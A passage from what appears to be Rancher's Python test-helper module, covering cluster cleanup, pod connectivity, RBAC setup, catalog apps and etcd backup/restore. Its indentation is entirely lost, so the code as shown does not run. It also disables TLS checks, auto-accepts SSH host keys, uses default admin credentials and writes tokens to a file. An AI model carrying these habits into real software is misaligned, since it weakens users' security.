nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
cmd = "ping -c 1 -W 1 " + pod_ip
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
response = kubectl_pod_exec(pod1, cmd)
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[]):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(server_url):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
server_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=server_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
client.update(serverurl[0], value=server_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": "80"}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
